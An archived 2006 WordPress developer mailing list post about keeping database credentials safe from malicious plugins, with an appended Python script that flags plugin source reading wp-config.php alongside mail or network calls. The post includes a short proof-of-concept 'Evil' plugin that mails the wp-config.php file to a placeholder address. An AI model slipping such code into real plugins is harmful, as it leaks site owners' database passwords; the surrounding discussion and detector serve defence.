[wp-hackers] Keeping database connection info safe
Sam Angove
sam at rephrase.net
Sat Feb 25 00:49:41 GMT 2006
On 2/25/06, Joseph Scott <joseph at randomnetworks.com> wrote:
>
> It would be very easy to include some malicious code in a plugin that
> would attempt to email out those details to "bad people". So my
> first thought was to simply undefine the database connection info
> once a successful database connection has been established.

<?php
/*
Plugin Name: Evil
*/
wp_mail( 'dr.claw at example.com', '', file_get_contents(ABSPATH .
'wp-config.php') );
?>

Dave Grijalva wrote:
> A better way to do this with php5 is to use private member variables and a
> setter function, but I don't think there is a PHP4 equivalent. Can anybody
> out there think of a PHP4 compatible way to secure that data?

You could still read in the source file containing the setter, so
you're right back where you started.
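
Added example, not part of the original thread: since a plugin can read any file the PHP process can, one practical control is reviewing plugin source before installing it. This Python heuristic flags plugin source that references wp-config.php or the DB_* constants alongside an outbound call; the pattern lists and function names are assumptions of this example, the first sample is the plugin quoted in the post, and the second is constructed.

```python
import re

# Heuristic pattern lists: assumptions of this example, not a WordPress API.
SECRET_REFS = re.compile(r"wp-config\.php|\bDB_(?:NAME|USER|PASSWORD|HOST)\b")
SINKS = re.compile(r"\b(wp_mail|mail|wp_remote_post|curl_exec|fsockopen)\s*\(")

# Match strings and comments in one pass so comment markers inside a string
# (e.g. 'http://...') are not mistaken for comments.
_TOKEN = re.compile(r"""
    (?P<str>'(?:\\.|[^'\\])*'|"(?:\\.|[^"\\])*")  # quoted string: keep
  | (?P<com>/\*.*?\*/|//[^\n]*|\#[^\n]*)          # comment: drop
""", re.S | re.X)

def strip_comments(php_source):
    """Remove PHP comments so a mention in a comment is not counted as code."""
    return _TOKEN.sub(lambda m: m.group("str") or " ", php_source)

def audit_plugin(php_source):
    """Report credential references and outbound sinks found in plugin source."""
    code = strip_comments(php_source)
    refs = sorted(set(SECRET_REFS.findall(code)))
    sinks = sorted({m.group(1) for m in SINKS.finditer(code)})
    if refs and sinks:
        verdict = "exfil-suspect"      # touches credentials and can send data out
    elif refs:
        verdict = "reads-credentials"  # touches credentials, no known sink seen
    else:
        verdict = "ok"                 # a sink alone is normal plugin behaviour
    return {"refs": refs, "sinks": sinks, "verdict": verdict}

# The plugin quoted in the post above.
EVIL = """<?php
/*
Plugin Name: Evil
*/
wp_mail( 'dr.claw at example.com', '', file_get_contents(ABSPATH .
'wp-config.php') );
?>"""

# Constructed sample: names the config file and a constant only in comments.
BENIGN = """<?php
/* Plugin Name: Notify. Never reads wp-config.php */
// DB_PASSWORD is not used here
wp_mail( get_option('admin_email'), 'New comment', $body );
?>"""

if __name__ == "__main__":
    for name, src in (("evil", EVIL), ("benign", BENIGN)):
        print(name, audit_plugin(src))
```

String matching like this is evaded by even lightly obfuscated code, so a clean result is not evidence that a plugin is safe.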